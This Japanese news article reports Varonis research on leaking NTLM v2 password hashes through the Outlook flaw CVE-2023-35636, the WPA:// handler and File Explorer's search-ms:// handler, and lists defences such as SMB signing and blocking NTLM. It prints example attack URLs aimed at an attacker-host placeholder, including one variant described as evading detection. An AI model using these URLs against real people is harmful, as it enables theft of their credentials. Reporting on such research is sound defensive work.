Varonisは1月29日(米国時間)、「Outlook Vulnerability Discovery and New Ways to Leak NTLM Hashes」において、Microsoftの認証プロトコル「NTLM v2」のハッシュ化されたパスワードにアクセスする3つの方法を発見したと伝えた。発見されたアクセス方法は、Outlookの新しい脆弱性、Windowsパフォーマンスアナライザー(WPA: Windows Performance Analyzer)、Windowsのファイルエクスプローラーを使用する3種類で、それぞれの窃取方法、攻撃シナリオを解説している。

  • Outlook Vulnerability Discovery and New Ways to Leak NTLM Hashes

    Outlook Vulnerability Discovery and New Ways to Leak NTLM Hashes

Outlookの新しい脆弱性

新しく発見されたOutlookの脆弱性は、「CVE-2023-35636」で追跡されており、2023年12月12日に修正パッチがリリースされている(参考:「CVE-2023-35636 - セキュリティ更新プログラム ガイド - Microsoft - Microsoft Outlook の情報漏えいの脆弱性」)。

Varonisによると、この脆弱性はOutlookのカレンダー共有機能の不具合にある。メールに2つのヘッダーを追加することでOutlookにコンテンツの共有を要求し、ユーザー操作を介して指定のコンピューターに接続させ、NTLM v2ハッシュを窃取する機会を作る。このパスワードのハッシュ値はランダムな値などを含まないため、窃取されるとパスワードを知らなくても認証が可能になるとされる。

  • 脆弱性を悪用してハッシュ値を窃取する例 - 提供:Varonis

    脆弱性を悪用してハッシュ値を窃取する例 引用:Varonis

一般的に攻撃者はNTLM v2のハッシュ値を窃取すると、ブルートフォース攻撃によりパスワードを解読する。また、既知のパスワードに対する膨大なハッシュ値からパスワードを応答する無料のWebツールも存在するため、簡単に解読できる場合もある。

Windowsパフォーマンスアナライザー(WPA)

WindowsパフォーマンスアナライザーはWindowsパフォーマンスツールキットまたはソフトウェア開発キットに含まれる強力な分析ツール。このツールは多くの開発者の環境で使用可能とされ、URLハンドラー「WPA://」からプログラムを起動することができる。

攻撃者は標的にURL「WPA:////<攻撃者のIP>/bla」を開かせて、Windowsパフォーマンスアナライザーを起動させる。Windowsパフォーマンスアナライザーは指定のサーバに接続する際に、NTLM v2認証を試みるためハッシュ値を窃取される。

Windowsファイルエクスプローラー

Windowsの標準的なファイル操作アプリケーション「エクスプローラー」も攻撃に悪用可能としている。エクスプローラーには検索を実行するURLハンドラー「search-ms://」が存在する。攻撃者はURL「search-ms://query=poc&subquery=\<攻撃者のコンピュータ>\poc.search-ms」を標的に開かせることで、攻撃者のSMBサーバへ接続させることができる。その際にNTLM v2認証が行われ、ハッシュ値が窃取される。ただし、この手法はログに記録が残るため、セキュリティソリューションに検出される可能性がある。

検出を回避可能な方法として、URL「search-ms://query=poc&crumb=location:\<攻撃者のコンピュータ>」を使用する方法があるという。この方法の場合、rundll32インスタンスが生成されないため、検出を回避できる可能性があるとされる。

対策

MicrosoftはOutlookの脆弱性を認め、修正パッチをリリースしている。他の2つに関しては「深刻度は中程度」と評価し、修正パッチを作成せずに対応を完了している。

Varonisはこれら攻撃からパスワードを保護する方法として、以下を推奨している。

  • SMB署名を有効にする。この機能はすべてのSMBメッセージに電子署名することでSMBトラフィックを改ざんや中間者攻撃(MITM: Man-in-the-middle attack)から保護する。Windows Server 2022およびWindows 11 Enterpriseエディション(Insider Preview build 25381)以降においてはデフォルトで有効になっている
    • Windows 11(Insider Preview build 25951)およびWindows Server Preview build 25951以降からサポートされるSMB NTLM認証ブロック機能を使用する(参考:「SMB NTLM blocking now supported in Windows Insider - Microsoft Community Hub」)
    • 可能な限りKerberos認証を強制し、ネットワークおよびアプリケーションの両方でNTLM認証をブロックする

これら対策からわかるように、NTLM認証はすでに安全ではない。Microsoft Windowsを利用するすべてのユーザーは、NTLM認証がどのような条件下で使用されるか認識し、使用をブロックするか、または可能な限り使用を回避するように注意することが望まれている。